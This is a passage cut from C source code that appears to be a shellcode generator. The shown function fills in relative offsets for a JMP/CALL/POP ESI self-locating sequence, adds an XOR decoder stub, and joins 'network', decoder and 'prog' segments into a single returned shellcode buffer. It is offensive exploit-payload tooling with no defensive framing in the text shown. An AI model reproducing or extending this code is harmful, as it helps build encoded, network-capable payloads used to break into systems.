      sprintf(xor_code, "%s%s\0", xor_code, CALL);
      
      shellcode = (char *) malloc(strlen(network)+strlen(pre_pop)+strlen(after_pop)+strlen(prog)+strlen(xor_code) + 1);
      sprintf(shellcode, "%s%s%s%s%s\0", pre_pop, xor_code, network, after_pop, prog);
    }
  else
    {
      JMP[1] = (char) (strlen(after_pop) + strlen(xor_code) + 1);
      CALL[1] = (char) (0xFF - (strlen(after_pop) + strlen(xor_code) + 4 + 1));

      sprintf(pre_pop, "%s%s%s\0", pre_pop, JMP, POP_ESI);
      sprintf(after_pop, "%s%s\0", after_pop, CALL);
      
      shellcode = (char *) malloc(strlen(network)+strlen(pre_pop)+strlen(after_pop)+strlen(prog)+strlen(xor_code) + 1);
      sprintf(shellcode, "%s%s%s%s%s\0", network, pre_pop, xor_code, after_pop, prog);
    }
  
  free_codes();
  return shellcode;
}
